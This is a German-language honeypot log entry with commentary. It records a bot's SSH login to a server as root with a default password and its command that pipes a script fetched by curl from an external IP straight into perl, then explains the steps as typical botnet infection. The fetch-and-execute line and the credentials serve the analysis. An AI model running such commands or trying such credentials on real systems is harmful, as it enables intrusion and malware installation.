29.09.2026, 18:40 UTC · 2 Befehle · über ssh · Philippinen
user='root' pass='Linux2025' root@srv01:~$ uname -a 2>/dev/null Linux proxy 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2023-07-05) x86_64 GNU/Linux root@srv01:~$ curl -sS --max-time 1 http://[IP]/zed 2>/dev/null | perl & [1] 1234
Der Angreifer meldete sich über SSH mit den Standardzugangsdaten root und dem Passwort Linux2025 an. Nach der erfolgreichen Anmeldung führte er zunächst einen Befehl zur Abfrage der Systeminformationen aus. Anschließend lud er ein Skript von einer externen Adresse herunter und leitete es direkt zur Ausführung an den Perl-Interpreter weiter.
Der Befehl uname -a gibt detaillierte Informationen über das Betriebssystem und die Architektur aus, wobei Fehlermeldungen unterdrückt werden. Das Kommando curl lädt eine Datei von der angegebenen URL herunter, wobei die Option max-time den Vorgang nach einer Sekunde abbricht, falls keine Antwort kommt. Der Parameter sS sorgt für stille Ausgabe und zeigt nur Fehler an. Die Pipe leitet den heruntergeladenen Inhalt direkt an perl weiter, was bedeutet, dass der Code ohne vorherige Speicherung auf der Festplatte ausgeführt wird.
Das Vorgehen deutet auf die Installation einer Schadsoftware oder eines Botnet-Agents hin. Die Kombination aus automatisierter Anmeldung und sofortigem Download eines Skripts ist typisch für Masseninfektionen. Der genaue Zweck des geladenen Codes bleibt unklar, da die Analyse des Honeypots nur die Ausführung, nicht den Inhalt des Skripts zeigt.
Dieses Muster ist extrem verbreitet und wird von automatisierten Bots täglich millionenfach versucht. Es handelt sich um Standardverhalten im Rahmen von Botnet-Aktivitäten, die nach schwach gesicherten Systemen suchen.